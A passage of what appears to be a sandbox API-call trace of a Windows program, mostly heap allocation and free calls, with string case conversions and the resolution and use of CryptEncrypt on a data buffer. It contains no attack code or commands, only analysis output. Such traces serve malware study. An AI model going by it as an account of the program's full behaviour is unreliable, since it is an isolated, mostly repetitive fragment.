hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.578] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.578] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.578] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.579] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.579] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.580] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.581] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.581] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0262.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.583] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.583] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.583] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.584] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.584] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24cb768 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa0c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.590] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.591] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x9e84, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x9e88) returned 1 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 